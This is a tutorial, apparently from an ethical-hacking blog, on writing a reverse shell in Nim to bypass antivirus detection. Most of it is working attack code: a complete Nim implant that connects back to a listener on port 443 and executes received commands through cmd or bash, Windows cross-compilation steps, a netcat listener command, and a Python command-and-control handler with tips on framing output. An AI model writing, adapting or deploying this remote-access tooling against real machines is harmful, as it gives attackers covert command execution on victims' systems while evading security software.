In this tutorial, you will learn how to write a reverse shell in Nim to bypass antivirus detection.

What Is Nim?

Nim is a compiled, statically typed language. Its syntax looks like Python (indentation-based and lightweight), but like Go it produces native binaries rather than running through an interpreter.

Why Use Nim?

Whatever you think of Python or Go, Nim is worth a look for offensive tooling:

  • Very mature FFI (Foreign Function Interface)
  • Smaller compiled binaries than Go (tens to a few hundred KB, against more than a megabyte for a comparable Go binary)
  • Cross-compilation from Linux to Windows with mingw-w64, so one build box covers both targets, much as with Go
  • Can call the Windows API directly via the FFI


Here’s What You Need

  1. Kali Linux VM
  2. Windows 10 VM

Once Nim is installed on Kali Linux (for example with sudo apt install nim), compile a program with nim c program.nim, or use nim c -r program.nim to compile and run it in one step.

Write A Reverse Shell In Nim

A reverse shell is a good first project for offensive tooling in Nim. The syntax reads like Python, but the result is a native binary that runs with Go-like speed. The code for the reverse shell is on The Ethical Hacking Guru GitHub.

You will not need to download any additional modules to run this code.

import os, net, osproc

proc runCommand(cmd: string): string =
  ## Run one command through the platform shell and return its output.
  ## execProcess merges stderr into stdout (poStdErrToStdOut is a default).
  when defined(windows):
    # With poEvalCommand (also a default) the whole line is handed to
    # CreateProcess unchanged and cmd.exe parses everything after /c.
    result = execProcess("cmd /c " & cmd)
  else:
    # Pass the command to bash as a single argument so spaces and quotes
    # inside it survive; without poEvalCommand the args are used verbatim.
    result = execProcess("bash", args = ["-c", cmd],
                         options = {poStdErrToStdOut, poUsePath})

proc run(target: string, rport: int) =
  ## Connect back to the listener and serve one command per line.
  let sock = newSocket()
  try:
    sock.connect(target, Port(rport))
    while true:
      # recvLine strips the line ending and returns "" when the listener
      # disconnects, so that case ends the loop as well.
      let cmd = sock.recvLine()
      if cmd.len == 0 or cmd == "exit":
        break
      sock.send(runCommand(cmd))
  finally:
    sock.close()

when isMainModule:
  # The listener address comes from the first command-line argument.
  if paramCount() < 1:
    echo "usage: ", getAppFilename(), " <listener-ip>"
    quit(1)
  let rport = 443
  let target = paramStr(1)
  run(target, rport)

The code is short. Nim is statically typed, but you only have to write a type out when the compiler cannot infer it from the initial value (a port assigned from an integer literal is an int without saying so). proc declares a procedure (a function): each parameter gets a type in the signature, and the return type, if any, follows the parameter list. A proc that returns nothing can write : void or simply omit the return type.

The when isMainModule check is true only when the file is compiled as the main program, not when it is imported as a module, much like Python's if __name__ == "__main__". Python's documentation describes it as "'__main__' is the name of the scope in which top-level code executes. A module's __name__ is set equal to '__main__' when read from standard input," and Nim's documentation describes isMainModule as "True only when accessed in the main module. This works thanks to compiler magic. It is useful to embed testing code in a module."

Cross-compiling from Linux to Windows is simple: install the MinGW toolchain with sudo apt install mingw-w64, then build with nim c -d:mingw --cpu:amd64 reverse_shell.nim for 64-bit Windows (-d:mingw selects Windows as the target OS). Copy the resulting reverse_shell.exe to the Windows 10 VM. To test it, start a listener on Kali with nc -lvnp 443 (443 is a privileged port, so run netcat as root or pick a higher port and change the port in the source to match), then run reverse_shell.exe <kali-ip> on Windows. Each line you type into netcat is executed on the target and its output comes back over the same connection.
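The listener side of that exchange, written out as an added Python example (not code from the post or its GitHub repository): it speaks the same protocol the Nim implant above expects, one newline-terminated command per line with the raw command output coming back, and shows the caveat netcat hides from you: the implant sends no end-of-output marker, so the handler has to decide for itself when a command has finished. To run offline, the block includes a small stand-in for the implant that mirrors the Nim loop; the loopback port, timeouts and command list are constructed for the demo.

```python
import socket
import subprocess
import threading


def recv_until_quiet(conn, first_byte_timeout=5.0, quiet=0.3):
    """Collect one command's output from the implant.

    The protocol gives the listener no end-of-output marker (the implant
    writes execProcess's raw result and nothing else), so the handler waits
    up to `first_byte_timeout` for output to start and then treats `quiet`
    seconds of silence as "the command is done". Returns the raw bytes.
    """
    chunks = []
    conn.settimeout(first_byte_timeout)
    try:
        while True:
            data = conn.recv(4096)
            if not data:            # implant closed its end of the socket
                break
            chunks.append(data)
            conn.settimeout(quiet)  # output has started; a short gap ends it
    except socket.timeout:
        pass                        # silence: assume the command finished
    finally:
        conn.settimeout(None)
    return b"".join(chunks)


def run_session(conn, commands):
    """Drive the implant: send each command as a newline-terminated line
    (what its recvLine() expects), collect the output of each, then send
    'exit' so the implant leaves its loop and closes the connection."""
    outputs = []
    with conn:
        for cmd in commands:
            conn.sendall(cmd.encode() + b"\n")
            outputs.append(recv_until_quiet(conn))
        conn.sendall(b"exit\n")
    return outputs


def fake_implant(host, port):
    """Stand-in for the Nim implant, constructed for this demo only. It
    mirrors the Nim loop: read a line, stop on 'exit' or disconnect, run the
    line through the local shell with stderr merged into stdout (as
    execProcess does by default), and send the output back unframed."""
    with socket.create_connection((host, port)) as s:
        reader = s.makefile("rb")
        while True:
            line = reader.readline()
            if not line:
                break
            cmd = line.rstrip(b"\r\n").decode()
            if cmd == "exit":
                break
            proc = subprocess.run(cmd, shell=True,
                                  stdout=subprocess.PIPE,
                                  stderr=subprocess.STDOUT)
            s.sendall(proc.stdout)


def demo(commands):
    """Run the whole exchange on loopback (ephemeral port; a real listener
    would bind 0.0.0.0:443) and return the raw output of each command."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    with srv:
        srv.bind(("127.0.0.1", 0))
        srv.listen(1)
        port = srv.getsockname()[1]
        implant = threading.Thread(target=fake_implant,
                                   args=("127.0.0.1", port), daemon=True)
        implant.start()
        conn, _ = srv.accept()
        outputs = run_session(conn, commands)
    implant.join(timeout=5)
    return outputs


if __name__ == "__main__":
    cmds = ["echo hello", "echo oops 1>&2", "printf no-trailing-newline"]
    for cmd, out in zip(cmds, demo(cmds)):
        print(f"{cmd!r} -> {out!r}")
```

The silence heuristic is what an interactive operator does by eye; a more deterministic alternative is to have the shell supply the framing, since the implant runs whatever it is given: append a marker to each command (cmd; echo __done__ for bash, cmd & echo __done__ for cmd.exe) and read until the marker arrives. Note also that nothing in this protocol is encrypted; using port 443 only makes the connection look like HTTPS to a casual observer, and the commands and their output cross the wire in the clear.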

Recommended Reading

Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.

